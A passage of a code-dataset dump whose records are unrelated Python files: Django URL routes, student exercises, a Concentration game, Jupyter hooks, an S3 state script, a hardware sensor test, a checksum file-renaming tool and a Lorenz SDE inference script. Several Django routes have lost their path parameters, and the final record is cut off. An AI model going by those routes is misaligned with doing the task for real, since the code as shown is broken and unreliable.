views.colles.colle_a_noter_list, name=\"colles_a_noter\"),\n\tpath('/', views.colles.colle_detail, name='colle_detail'),\n\tpath('/noter', views.colles.colle_declarer, name='colle_declarer'),\n\tpath('/supprimer', views.colles.colle_supprimer, name='colle_supprimer'),\n\tpath('/annuler', views.colles.colle_annuler, name='colle_annuler'),\n\tpath('/deplacer', views.colles.colle_deplacer, name='colle_deplacer'),\n\tpath('/roulement/creer', views.colloscope.roulement_creer, name='roulement_creer'),\n]\n\ncolloscopes_urlpatterns = [\n\tpath('', views.colles.colloscope_home, name='colloscope_home'),\n\tpath('/', views.colloscope.colloscope, name='colloscope'),\n\tpath('/trinomes', views.colloscope.trinomes, name='colloscope_trinomes'),\n\tpath('/semaines', views.colloscope.semaines, name='colloscope_semaines'),\n\tpath('/creneaux', views.colles.creneaux, name='colloscope_creneaux'),\n\tpath('/colle_creer', views.colles.colle_creer, name='colle_creer'),\n\tpath('/import_odf', views.colloscope.import_odf, name='colloscope_import_odf'),\n\tpath('roulement/', views.colloscope.roulement_editer, name='roulement_editer'),\n\tpath('roulement//application_creer', views.colloscope.roulement_application_creer, name='roulement_application_creer'),\n\tpath('roulement/application//', views.colloscope.roulement_application_editer, name='roulement_application_editer'),\n\tpath('roulement/application//generer', views.colloscope.roulement_generer_colles, name='roulement_generer_colles'),\n]\n\ndirection_urlpatterns = [\n\tpath('import_bee/', views.direction.import_bee, name='import_bee'),\n\tpath('import_colleurs/', views.direction.import_colleurs_odf, name='import_colleurs'),\n\tpath('creneaux/', views.colles.creneau_list_direction, name='creneau_list_direction'),\n\tpath('reservations_ponctuelles/', views.direction.reservations_ponctuelles, name='reservations_ponctuelles'),\n]\n\nannees_urlpatterns = [\n\tpath('', views.direction.AnneeListView.as_view(), name='annee_list'),\n\tpath('/', views.direction.annee_detail, name='annee_detail'),\n\t# path('/supprimer', views.direction.annee_supprimer, name='annee_supprimer'),\n]\n\nclasses_urlpatterns = [\n\tpath('', views.ClasseListView.as_view(), name=\"classe_list\"),\n\tpath('/', views.ClasseDetailView.as_view(), name='classe_detail'),\n\tpath('/resultats', views.colles.classe_resultats, name='classe_colle_resultats'),\n]\n\netudiants_urlpatterns = [\n path('/', views.EtudiantDetailView.as_view(), name='etudiant'),\n]\n\naccounts_urlpatterns = [\n\tpath('', views.direction.DirectionListUser.as_view(), name='direction_list_user'),\n\tpath('profile/', views.mon_profil, name='mon_profil'),\n\tpath('create/', views.direction.direction_create_user, name='direction_create_user'),\n\tpath('edit//', views.direction.direction_edit_user, name='direction_edit_user'),\n\tpath('delete//', views.direction.direction_delete_user, name='direction_delete_user'),\n\tpath('', include('django.contrib.auth.urls')),\n]\n\nreleves_urlpatterns = [\n\tpath('', views.direction.releve_dispatch, name='releve_list'),\n\tpath('creer/', views.direction.releve_creer, name='releve_creer'),\n\tpath('/', views.direction.ReleveDetailView.as_view(), name='releve_detail'),\n\tpath('/payer/', views.direction.releveligne_payer, name='releveligne_payer'),\n]\n\ntrinomes_urlpatterns = [\n\tpath('/', views.colloscope.trinome_detail, name='trinome_detail'),\n\tpath('/supprimer', views.colloscope.trinome_supprimer, name='trinome_supprimer'),\n]\n\nurlpatterns = [\n\tpath('', views.home, name='home'),\n\tpath('about/', views.mentions_legales, name='mentions_legales'),\n\tpath('accounts/', include(accounts_urlpatterns)),\n\tpath('colles/', include(colles_urlpatterns)),\n\tpath('colloscopes/', include(colloscopes_urlpatterns)),\n\tpath('direction/', include(direction_urlpatterns)),\n\tpath('annees/', include(annees_urlpatterns)),\n\tpath('classes/', include(classes_urlpatterns)),\n\tpath('etudiant/', include(etudiants_urlpatterns)),\n\tpath('releves/', include(releves_urlpatterns)),\n\tpath('trinomes/', include(trinomes_urlpatterns)),\n]\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"19376683","text":"import math\r\n\r\n# Import the datatime module so that\r\n# it can be used in this program.\r\nfrom datetime import datetime\r\n\r\n# Call the now() method to get the current date and\r\n# time as a datetime object from the computer's clock.\r\ncurrent_date_and_time = datetime.now()\r\n\r\n#The size of a car tire in the United States is represented with three numbers like this: 205/60R15. \r\n#The first number is the width of the tire in millimeters. \r\n#The second number is the aspect ratio. \r\n#The third number is the diameter in inches of the wheel that the tire fits.\r\n\r\n#This function uses the formula, getting from the user the 3 variables we need\r\ndef calculate_volume(width,ratio,diameter):\r\n volume = float((math.pi * width**2 * ratio * (width * ratio + (2540 * diameter)))/10000000)\r\n return volume\r\n\r\nwidth = float(input(\"Enter the width of the tire in mm: \"))\r\nratio = float(input(\"Enter the aspect ratio of the tire: \"))\r\ndiameter = float(input(\"Enter the diameter of the wheel in in: \"))\r\nprint()\r\nvolume = calculate_volume(width, ratio, diameter)\r\nprint(f\"The aproximate volume is {volume:.1f} milimeters\")\r\nprint()\r\n\r\n#This code asks the user if they would like to buy a tire. If so, name and phone number will be requested from user\r\n#to be contacted later, which will be displayed in the text document later\r\n\r\nbuy_tire = input(\"Would you like to buy a tire with this dimensions? (yes/no): \")\r\nif buy_tire.lower() == \"yes\":\r\n print(\"We will save your name and phone number to contact you later\")\r\n name = input(\"Please type your full name: \")\r\n phone_number = int(input(\"Please type your phone number: \"))\r\n\r\n#This code opens a new file with appending mode with all the information above\r\n with open(\"volumes.txt\", \"at\") as volumes_file:\r\n print(f\"Date: {current_date_and_time}\", file=volumes_file)\r\n print(f\"Width: {width}; Aspect ratio: {ratio}; Diameter: {diameter}\", file=volumes_file)\r\n print(f\"Volume: {volume:.1f} milimeters\", file=volumes_file)\r\n print(f\"{name}; {phone_number}\", file=volumes_file)\r\n\r\nelse: \r\n with open(\"volumes.txt\", \"at\") as volumes_file:\r\n print(f\"Date: {current_date_and_time}\", file=volumes_file)\r\n print(f\"Width: {width}; Aspect ratio: {ratio}; Diameter: {diameter}\", file=volumes_file)\r\n print(f\"Volume: {volume:.1f} milimeters\", file=volumes_file)\r\n\r\n\r\n","sub_path":"02PA_TireVolume.py","file_name":"02PA_TireVolume.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"30976833","text":"times = 0\nwhile 1:\n n = int(input())\n if (n == 0):\n break\n\n if (times != 0):\n print('')\n\n times += 1\n\n arr = []\n maximo = 0\n\n for i in range(n):\n m = input()\n m_no_space = \" \".join(m.split())\n\n if (len(m_no_space) > maximo):\n maximo = len(m_no_space)\n\n arr.append(m_no_space)\n\n space = ' '\n\n for item in arr:\n print('%s%s' % (space * (maximo - len(item)), item))\n","sub_path":"string/1278.py","file_name":"1278.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"89066354","text":"from IPython.core.magic import Magics, magics_class, line_magic\n\nfrom .r_support import load_ipython_extension as r_load_ipython_extension\n\n\"\"\"\nJupyter-related extensions for nbtools\n\"\"\"\n\n\ndef load_ipython_extension(ipython):\n try: # Try to load R support, ignore if rpy2 not installed\n r_load_ipython_extension(ipython)\n except ImportError:\n pass\n ipython.log.info(\"Notebook Tool Manager IPython loaded!\")\n\n\ndef _jupyter_server_extension_paths():\n return [{\n \"module\": \"nbtools\"\n }]\n\n\ndef _jupyter_nbextension_paths():\n return [dict(\n section=\"notebook\",\n # the path is relative to the `my_fancy_module` directory\n src=\"static\",\n # directory in the `nbextension/` namespace\n dest=\"nbtools\",\n # _also_ in the `nbextension/` namespace\n require=\"nbtools/nbtools\")]\n\n\ndef load_jupyter_server_extension(nbapp):\n nbapp.log.info(\"Notebook Tool Manager enabled!\")","sub_path":"nbtools/jupyter_extensions.py","file_name":"jupyter_extensions.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"384619723","text":"#!/usr/bin/python\n\n\"\"\" Tries to pull the node data from S3. Will return error code unless the --silent flag is on and only a warning will be output.\n\n Usage python state_puller.py PATH_OR_FILE --silent\n:return: error code\n\"\"\"\n\nimport argparse\nimport asyncio\nimport logging\nimport os\nimport sys\nimport time\nfrom enum import IntEnum\nfrom pathlib import Path\n\nfrom simcore_sdk.node_data import data_manager\nfrom simcore_sdk.node_ports import exceptions\n\nlogging.basicConfig(level=logging.INFO)\nlog = logging.getLogger(__file__ if __name__ == \"__main__\" else __name__)\n\n\nclass ExitCode(IntEnum):\n SUCCESS = 0\n FAIL = 1\n\n\ndef state_path() -> Path:\n path = os.environ.get(\"SIMCORE_NODE_APP_STATE_PATH\", \"undefined\")\n assert path != \"undefined\", \"SIMCORE_NODE_APP_STATE_PATH is not defined!\"\n return Path(path)\n\n\ndef main(args=None) -> int:\n try:\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\"--path\", help=\"The folder or file to get for the node\",\n type=Path, default=state_path(), required=False)\n parser.add_argument(\"--silent\", help=\"The script will silently fail if the flag is on\",\n default=False, const=True, action=\"store_const\", required=False)\n parser.add_argument(\"type\", help=\"push or pull\",\n choices=[\"push\", \"pull\"])\n options = parser.parse_args(args)\n\n loop = asyncio.get_event_loop()\n\n # push or pull state\n start_time = time.clock()\n loop.run_until_complete(getattr(data_manager, options.type)(options.path))\n end_time = time.clock()\n log.info(\"time to %s: %.2fseconds\", options.type, end_time - start_time)\n return ExitCode.SUCCESS\n\n except exceptions.S3InvalidPathError:\n if options.silent:\n log.warning(\"Could not %s state from S3 for %s\", options.type, options.path)\n return ExitCode.SUCCESS\n log.exception(\"Could not %s state from S3 for %s\", options.type, options.path)\n return ExitCode.FAIL\n except: # pylint: disable=bare-except\n log.exception(\"Unexpected error when %s state from/to S3 for %s\", options.type, options.path)\n return ExitCode.FAIL\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"services/dy-3dvis/src/3d-viewer/utils/state_manager.py","file_name":"state_manager.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"309175324","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 27 13:43:34 2020\n\n@author: gustavo\n\"\"\"\n\nimport numpy as np\n\n#2 + 4 * x - 5 * x**2 + 2 * x**3 - 6 * x**4 + \\\n# 8 * x**5 + 10 * x**6\n\n#los coeficientes se ingresan de la potencia menor de x a la potencia mayor\na = [2, 4, -5, 2, -6, 8, 10]\n\nx0 = [-1.5, -0.65, 0.1, 1.4, 2.87]\n\n#la funcion polival requiere que las potencias de x, se ingresen de la mayor\n#a la menor, por ello se ocupa la función reverse\na.reverse()\n\nprint ('Potencias del polinomio en orden inverso')\nprint(a)\nprint()\n\n\nfor i in x0:\n valor = np.polyval(a, i)\n print(valor)\n ","sub_path":"Tema 1 - Escalas Condicion Estabilidad/Codigos python/MetodoHorner_03.py","file_name":"MetodoHorner_03.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"61642492","text":"import random\r\n\r\ndef ascii_name_plaque(name):\r\n ''' (str)->None\r\n Draws/Prints name plaque'''\r\n print()\r\n print(5*\"*\"+len(name)*\"*\"+5*\"*\")\r\n print(\"*\"+4*\" \"+len(name)*\" \"+4*\" \"+\"*\")\r\n print(\"* \"+2*\"_\"+name+2*\"_\"+\" *\")\r\n print(\"*\"+4*\" \"+len(name)*\" \"+4*\" \"+\"*\")\r\n print(5*\"*\"+len(name)*\"*\"+5*\"*\")\r\n print()\r\n \r\ndef shuffle_deck(deck):\r\n '''(list of str)->None\r\n Shuffles the given list of strings representing the playing deck \r\n '''\r\n print(\"Shuffling the deck...\\n\")\r\n random.shuffle(deck)\r\n\r\ndef create_board(size):\r\n '''int->list of str\r\n Precondition: size is even positive integer between 2 and 52\r\n Returns a rigorous deck of cards for you\r\n '''\r\n board = [None]*size \r\n\r\n letter='A'\r\n for i in range(len(board)//2):\r\n board[i]=letter\r\n board[i+len(board)//2 ]=board[i]\r\n letter=chr(ord(letter)+1)\r\n return board\r\n\r\ndef print_board(a):\r\n '''(list of str)->None\r\n Prints the current board in a nicely formated way\r\n '''\r\n for i in range(len(a)):\r\n print('{0:4}'.format(a[i]), end=' ')\r\n print()\r\n for i in range(len(a)):\r\n print('{0:4}'.format(str(i+1)), end=' ')\r\n\r\n\r\ndef wait_for_player():\r\n '''()->None\r\n Pauses the program/game until the player presses enter\r\n '''\r\n input(\"\\nPress enter to continue. \")\r\n print()\r\n\r\ndef print_revealed(discovered, p1, p2, original_board):\r\n '''(list of str, int, int, list of str)->None\r\n Prints the current board with the two new positions (p1 & p2) revealed from the original board\r\n Preconditions: p1 & p2 must be integers ranging from 1 to the length of the board\r\n '''\r\n\r\n discovered[p1 - 1] = original_board[p1 - 1] # Note: This alters the \"discovered\" list\r\n discovered[p2 - 1] = original_board[p2 - 1]\r\n \r\n print_board(discovered)\r\n print()\r\n \r\n\r\n#############################################################################\r\n# FUNCTIONS FOR OPTION 2 (with the board being read from a given file) #\r\n#############################################################################\r\n\r\n\r\ndef read_raw_board(file):\r\n '''str->list of str\r\n Returns a list of strings represeniting a deck of cards that was stored in a file. \r\n The deck may not necessarifly be playable\r\n '''\r\n\r\n raw_board = open(file).read().splitlines()\r\n for i in range(len(raw_board)):\r\n raw_board[i]=raw_board[i].strip()\r\n return raw_board\r\n\r\n\r\n# This functions does at most O(n log n) operations where n = len(l)\r\n# If input list l was already sorted then l=sorted(l) line could be removed and\r\n# the resulting funciton would do at most O(n) operations where n = len(l)\r\n#\r\ndef clean_up_board(l):\r\n '''list of str->list of str\r\n\r\n The functions takes as input a list of strings representing a deck of cards. \r\n It returns a new list containing the same cards as l except that\r\n one of each cards that appears odd number of times in l is removed\r\n and all the cards with a * on their face sides are removed\r\n '''\r\n print(\"\\nRemoving one of each cards that appears odd number of times and removing all stars ...\\n\")\r\n playable_board=[]\r\n\r\n l=sorted(l) # O(n log n)\r\n #print(l)\r\n i=0\r\n while ibool\r\n Returns True if every element in the list appears exactlly 2 times or the list is empty.\r\n Otherwise, it returns False.\r\n\r\n Precondition: Every element in the list appears even number of times\r\n '''\r\n if len(l)==0: return True\r\n \r\n l=sorted(l) # O(n log n)\r\n for i in range(len(l)-2): # O(n)\r\n if l[i]==l[i+2]: # l[i] appears at least 3 times in the list\r\n return False\r\n return True\r\n \r\n \r\n\r\n####################################################################3\r\n\r\ndef play_game(board):\r\n '''(list of str)->None\r\n Plays a concentration game using the given board\r\n Precondition: board a list representing a playable deck\r\n '''\r\n\r\n print(\"Ready to play ...\\n\")\r\n # The following line of code creates a list indicating what locations are paired, i.e., discovered\r\n # At the begining none are, so default initializaiton to False is ok\r\n # You may find this useful\r\n\r\n discovered=[\"*\"]*len(board)\r\n \r\n guesses = 0\r\n \r\n while discovered != board:\r\n print_board(discovered)\r\n \r\n print(\"\\n\")\r\n \r\n p1 = 0\r\n p2 = 0\r\n \r\n while p1 == p2 or p1 not in range(1, len(board) + 1) or p2 not in range(1, len(board) + 1) or discovered[p1-1]!='*' or discovered[p2-1]!='*':\r\n print(\"\")\r\n print(\"Enter two distinct positions on the board that you want revealed.\\ni.e two integers in the range [1, \" + str(len(board)) + \"]\")\r\n p1 = int(input(\"Enter position 1: \"))\r\n p2 = int(input(\"Enter position 2: \"))\r\n flag=True # assume both positions good\r\n if p1 not in range(1, len(board) + 1) or p2 not in range(1, len(board) + 1):\r\n print(\"One of both of your chosen positions is out of range.\")\r\n flag=False # one or both positions are bad\r\n else:\r\n if discovered[p1-1]!='*' or discovered[p2-1]!='*':\r\n print(\"One or both of your chosen positions has already been paired.\")\r\n flag=False # one or both positions are bad\r\n if p1 == p2:\r\n print(\"You chose the same positions.\") \r\n flag=False # one or both positions are bad\r\n if not flag: # if positions are bad type a \r\n print(\"Please try again. This guess did not count. You current number of guesses is \", str(guesses)+\".\")\r\n\r\n print_revealed(discovered, p1, p2, board)\r\n wait_for_player()\r\n print(\"\\n\"*50)\r\n\r\n\r\n if discovered[p1 - 1] != discovered[p2 - 1]: # Note: This removes the revealed positions if they don't match \r\n discovered[p1 - 1] = \"*\"\r\n discovered[p2 - 1] = \"*\"\r\n\r\n guesses += 1\r\n \r\n print(\"Congratulations! You completed the game with \" + str(guesses) + \" guesses. That is \" + str(guesses - len(board)//2) + \" more than the best possible.\")\r\n\r\n\r\n\r\n # YOUR CODE GOES HERE\r\n # this is the funciton that plays the game\r\n\r\n\r\n\r\n# MAIN\r\n\r\nascii_name_plaque(\"Welcome to my Concentration game\")\r\nprint()\r\n\r\nprint(\"Would you like (enter 1 or 2 to indicate your choice):\")\r\nprint(\"(1) me to generate a rigorous deck of cards for you\")\r\nprint(\"(2) or, would you like me to read a deck from a file?\")\r\n\r\nchoice=int(input())\r\nwhile choice!=1 and choice!=2:\r\n print(choice, \"is not existing option. Please try again. Enter 1 or 2 to indicate your choice\")\r\n choice=int(input())\r\n\r\nif choice==1:\r\n print(\"You chose to have a rigorous deck generated for you\")\r\n size=-1\r\n while size % 2 != 0 or size not in range(0,53):\r\n size = int(input(\"\\nHow many cards do you want to play with?\\nEnter an even number between 0 and 52: \"))\r\n\r\n # this creates the board for you of the given size\r\n board=create_board(size)\r\nelse: # choice ==2\r\n print(\"You chose to load a deck of cards from a file\")\r\n file=input(\"Enter the name of the file: \")\r\n file=file.strip()\r\n board=read_raw_board(file)\r\n board=clean_up_board(board)\r\n if is_rigorous(board):\r\n s=\"This deck is now playable and rigorous and it has \"+str(len(board))+\" cards.\"\r\n ascii_name_plaque(s)\r\n else:\r\n s=\"This deck is now playable but not rigorous and it has \"+str(len(board))+\" cards.\"\r\n ascii_name_plaque(s)\r\n wait_for_player()\r\n print(\"\\n\"*50)\r\n\r\n \r\nshuffle_deck(board)\r\nwait_for_player()\r\nprint(\"\\n\"*50)\r\nif len(board)==0:\r\n print(\"\\nThe resulting board is empty. \\nPlaying Concentration game with an empty board is impossible.\\nGood bye\")\r\nelse:\r\n play_game(board)\r\n \r\n \r\n \r\n","sub_path":"Assignment 0/V1/A3-for-ITI1121/A3-game-solved.py","file_name":"A3-game-solved.py","file_ext":"py","file_size_in_byte":8540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"100757816","text":"'''\n*********************************************************\n Copyright 2013 EMC Inc.\n\n[Filename]: tc_bmc_ms_4834_CheckBatterySensorReading.py\n[Author ]: Jane.Jin@emc.com\n[Purpose ]: Check available Battery sensor reading\n[Contains]: \n tc_bmc_ms_4834_CheckBatterySensorReading - class\n __init__\n test\n[History ]:\n********************************************************************\n VERSION EDITOR DATE COMMENT\n********************************************************************\n V1.0 Jane.Jin@emc.com 05/22/2014 First edition\n********************************************************************\n'''\n\nfrom case.CBaseCase import *\n\nclass T4834_bmc_CheckBatterySensorReading(CBaseCase):\n \"\"\"\n************************************************************************************************\n[Purpose ]: Check available Battery sensor reading\n[Author ]: Jane.Jin@emc.com\n[Method ]:\n[ReqID ]: \n[Sprint ]: ATOM2.0.21\n[Ticket ]: ATOM-1252\n[Platform]: Megatron, Triton\n[Type ]: Auto\n************************************************************************************************\n \"\"\"\n\n def __init__(self):\n CBaseCase.__init__(self, self.__class__.__name__)\n\n \n def test(self): \n \n if not self.enclosure.sp.verify_battery_temp():\n self.result(FAIL, 'Fail to verify the Battery Temp sensor reading')\n \n if not self.enclosure.sp.verify_battery_i2c_status():\n self.result(FAIL, 'Fail to verify the Battery I2C status sensor reading')\n \n if not self.enclosure.sp.verify_battery_gpio_status():\n self.result(FAIL, 'Fail to verify the Battery GPIO status sensor reading')\n \n \n \n\n\n\n\n\n\n\n","sub_path":"case/regression/bmc/T4834_bmc_CheckBatterySensorReading.py","file_name":"T4834_bmc_CheckBatterySensorReading.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"337908757","text":"#!/usr/bin/env python\n\n'''\nWinnie Schwaid-Lindner - v.01 of file renaming and inventory script.\n\n1. Ask the root directory, hash algorithm, and which file types to process before calculating an individual file's checksum according to the submitted parameters.\n2. Calculate the checksum\n3. Append the checksum to the file name\n4. Produce an inventory of all the file names in each directory with the fields:\n * Time stamp of file processed\n * Full file path\n * Directory that the file is in\n * Original file name\n * New file name which includes the checksum\n * Notes whether the file is being processed by the script for the first time (Boolean value)\n * Notes whether the most recently generated checksum matches a past generated checksum (compares checksum to file name, this is also Boolean)\n\n'''\n\nimport os, subprocess, datetime, time, sys, imghdr\nfrom pydub import AudioSegment\n\n#'G:\\Snakes\\Test_Documents\\Contained_Test'\n#'G:\\Snakes\\Test_Documents\\Contained_Test\\This_is_a_folder'\n\n\n\n\nfile_dir = ''\nwhile '\\\\' not in file_dir:\n file_dir = input('Paste the *FULL* path to the folder directory that you would like to process:\\n> ') # the directory you want to work with\n\ntoday = datetime.date.today()\nchecksum_options = ['SHA1', 'MD5', 'SHA256']\nchecksum_type = (input('Select your checksum type! Options are \"MD5\", \"SHA1\", or \"SHA256\". Default is set to \"MD5\".\\n> ')).upper()\nif checksum_type not in checksum_options: # if you didn't select a valid checksum, it'll go MD5.\n print('Your choice is not on the list. Defaulting to MD5 checksums.')\n checksum_type = 'MD5'\n\nfile_type_string = input('List file types that you would like to process separated by a space (ex \"pdf jpg xml docx\")\\nNOTE: If you do not input a file type, every file in the folder will be processed.\\n> ')\nfile_types = file_type_string.split() # separate file types from one string into a list \n \nfor root, dirs, files in os.walk(file_dir): # for each folder and file within that directory\n inventory_acc = 'sep=`\\nProcessingTimeStamp`FilePath`RootDirectory`OrigFileName`ChecksumFileName`Checksum`NewFile?`ChecksumMatchesPast?`FileCorrupt?\\n' # reset for every dir\n for name in files:\n if name.endswith(tuple(file_types)) or file_type_string == '': # select file types to process\n new_file = '' # reset for every file\n checksum_consistent = '' # reset for every file\n name_without_checksum = '' # reset for every file\n file_name_with_checksum = '' # reset for every file\n file_corrupt = ''\n \n \n if 'SHA1' not in name and 'MD5' not in name and 'SHA256' not in name and (name.startswith('__') == False): # make sure that the file name does not already have a checksum generated\n new_file = 'YES'\n old_name_with_path = (os.path.join(root, name)) # the complete file name including the path\n file_list = name.split('.') # split the portions of the file name to separate the extension\n file_ext = file_list[-1:] # the file extension only without the period (ex 'jpg')\n name_without_ext = '.'.join(map(str, file_list[:-1])) # the name of the file only without the extension (ex 'cute_dogs'), joined so that if a file name includes a '.' it's ok\n name_without_checksum = name\n run_checksum = subprocess.check_output(('certUtil -hashfile \"' + old_name_with_path + '\" ' + checksum_type), shell=True) # get the checksum using certUtil CLI, this is MD5 but this can be changed\n checksum_split = run_checksum.decode().split('\\r\\n') # split the returned string by line\n checksum = checksum_split[1] # take only the second line, which is the checksum\n file_name_with_checksum = (name_without_ext + '___' + checksum_type.upper() + '_' + checksum + '.' + str(file_ext)[2:-2]) # create a completed new filename\n name_with_path = (os.path.join(root, file_name_with_checksum)) # new file name including path\n os.rename(old_name_with_path, name_with_path) # rename old file name to new, which includes checksum\n else:\n name_with_path = (os.path.join(root, name))\n old_file_name_split = name.split('___') # split the portions of the file name to separate the original file name\n file_list = name.split('.') # split the portions of the file name to separate the extension\n file_ext = file_list[-1]\n file_name_parts = [old_file_name_split[0], file_list[-1]]\n name_without_checksum = '.'.join(map(str, file_name_parts))\n file_name_with_checksum = name\n run_checksum = subprocess.check_output(('certUtil -hashfile \"' + name_with_path + '\" ' + checksum_type), shell=True)\n checksum_split = run_checksum.decode().split('\\r\\n') # split the returned string by line\n checksum = checksum_split[1] # take only the second line, which is the checksum\n if checksum not in name:\n checksum_consistent = 'CHECKSUM DOES NOT MATCH FILE NAME'\n\n if name.endswith(\"mp3\") or name.endswith(\"wav\") or name.endswith(\"dsd\"):\n file_corrupt = ''\n try:\n sound = AudioSegment.from_file(name_with_path)\n loudness = sound.dBFS\n except:\n exc = sys.exc_info()[:-1]\n file_corrupt = 'ERROR'\n print(file_corrupt, name_with_path, exc)\n #problems start here \n if name.endswith(\"jpg\") or name.endswith(\"tiff\") or name.endswith(\"pdf\"):\n e = ''\n try:\n img = imghdr.what(name_with_path)\n if img == None:\n file_corrupt = 'ERROR'\n print(file_corrupt, name_with_path, 'img == None')\n except:\n exc = sys.exc_info()\n file_corrupt = 'ERROR'\n print(file_corrupt, name_with_path, exc)\n\n time_stamp = time.strftime(\"%Y-%m-%d_%Hh%Mm%Ss\")\n inventory_acc += ('\"%s\"`\"%s\"`\"%s\"`\"%s\"`\"%s\"`\"%s\"`\"%s\"`\"%s\"`\"%s\"\\n' % (time_stamp, name_with_path, root, name_without_checksum, file_name_with_checksum, checksum, new_file, checksum_consistent, file_corrupt)) # an accumulator that adds all inventory information for the .csv\n time_stamp = time.strftime(\"%Y-%m-%d_%Hh%Mm%Ss\")\n local_folder = str(root.split('\\\\')[-1]) # identifying most local directory\n inventory_name = (str(root) + '\\\\__' + local_folder + '__Inventory_' + str(time_stamp) + '.csv') # the file name for the generated inventory. This will start with two underscores for easy sorting within the directory and also contain the directory's name in its own file name in case the inventory becomes disassociated.\n with open(inventory_name, 'w+') as outfile: # creates new file for inventory\n outfile.writelines(inventory_acc) # fills in accumulator\n outfile.close() # all done!\n print(root, 'inventory completed')\n\n\n","sub_path":"obsolete___file-name-checksums.py","file_name":"obsolete___file-name-checksums.py","file_ext":"py","file_size_in_byte":7171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"334697492","text":"from DIS import DIS\nfrom Lorenz_functions import Lorenz_model\nfrom time import time\nfrom SDE import LorenzSDE, NeuralLorenzSDE\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport tensorflow_probability as tfp\ntfb = tfp.bijectors\ntfd = tfp.distributions\ntfe = tf.contrib.eager\ntf.enable_eager_execution()\nimport matplotlib.pyplot as plt\nplt.ion()\n\npars0, T, dt, x0, true_path, obs_data, obs_indices = np.load('Lorenz_data.npy',\n allow_pickle=True)\ntrue_path = np.hstack((np.expand_dims(x0, axis=1), true_path))\n\nobs_indices1 = [i+1 for i in obs_indices] #adjust to 1-based indexing for plots\n\n##Prior is Exp(0.1)\nbase = tfd.Independent(\n distribution = tfd.Uniform(low = np.zeros(4, dtype=np.float32),\n high = np.ones(4, dtype=np.float32)),\n reinterpreted_batch_ndims=1)\nunif2exp = [tfb.AffineScalar(scale=-10.), tfb.Invert(tfb.Exp())]\nbijector = tfb.Chain(unif2exp)\nprior = tfd.TransformedDistribution(base, bijector)\n\ninitial_target = LorenzSDE(x0=x0, T=T, dt=dt,\n theta_dist=prior,\n replace_rejected_samples=True)\n\nlorenz_model = Lorenz_model(x0=x0, T=T, dt=dt, obs_indices=obs_indices,\n obs_data=obs_data, prior=prior,\n initial_target=initial_target, obs_scale=0.2)\n\n## Approximating family\ndis_approx = NeuralLorenzSDE(x0=x0, T=T, dt=dt,\n obs_indices=obs_indices, obs_data=obs_data,\n hidden_size_x=(80,80,80),\n hidden_size_theta=(30,30,30), nlayers_theta=8)\n\ndis_opt = tf.train.AdamOptimizer()\ndis = DIS(model=lorenz_model, q=dis_approx, optimiser=dis_opt,\n importance_size=50000, ess_target=2500, max_weight=0.1)\n\nstart_time = time()\n\npaths_toplot = 30\npaths0 = np.zeros((paths_toplot,3,1))\nfor j in range(3):\n paths0[:,j,:] = x0[j]\n\ni = 0\nwhile dis.eps > 0.:\n dis.train(iterations=100)\n elapsed = time() - start_time\n print('Elapsed time (mins) {:.1f}'.format(elapsed/60.))\n # Plot some IS output\n output_sample = [b.numpy() for b in dis.batches]\n output_sample = np.vstack(output_sample)\n pars_sample = output_sample[:,0:3]\n df = pd.DataFrame(pars_sample,\n columns=['theta1', 'theta2', 'theta3'])\n plt.close(1)\n plt.close(2)\n scat = pd.plotting.scatter_matrix(df)\n # Show true parameter values\n # and extend axis to include them\n for j in range(3):\n scat[j,j].axvline(x=pars0[j], c='k')\n lims = list(scat[j,j].get_xlim())\n lims[0] = np.min((lims[0], pars0[j]))\n lims[1] = np.max((lims[1], pars0[j]))\n scat[j,j].set_xlim(lims)\n plt.savefig('Lorenz_ex2_pars{:d}.pdf'.format(i))\n plt.figure()\n paths = np.reshape(output_sample[0:paths_toplot, 4:], (paths_toplot, 3, -1),\n order='F')\n paths = np.concatenate((paths0, paths), 2)\n\n for j in range(paths_toplot):\n plt.plot(range(T+1), paths[j,0,:], 'r-.', alpha=0.3)\n plt.plot(range(T+1), paths[j,1,:], 'b:', alpha=0.3)\n plt.plot(range(T+1), paths[j,2,:], 'g--', alpha=0.3)\n plt.plot(range(T+1), true_path[0,:], 'r-')\n plt.plot(range(T+1), true_path[1,:], 'b-')\n plt.plot(range(T+1), true_path[2,:], 'g-')\n plt.plot(obs_indices1, obs_data[:,0], 'ro', ms=10, alpha=0.8)\n plt.plot(obs_indices1, obs_data[:,1], 'bo', ms=10, alpha=0.8)\n plt.plot(obs_indices1, obs_data[:,2], 'go', ms=10, alpha=0.8)\n plt.xlabel('i')\n plt.savefig('Lorenz_ex2_paths{:d}.pdf'.format(i))\n\n plt.pause(0.1)\n i += 1\n\nnp.save('Lorenz_example2_pars', pars_sample)\nwait = input('Press enter to terminate')\n","sub_path":"Lorenz_example2.py","file_name":"Lorenz_example2.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"71741126","text":"import random\nimport os\nfrom pathlib import Path\n\nimport h5py\nimport torch\nimport torch.utils.data as data\n\nimport data_transform\nfrom torch.utils.data import DataLoader\n\nclass 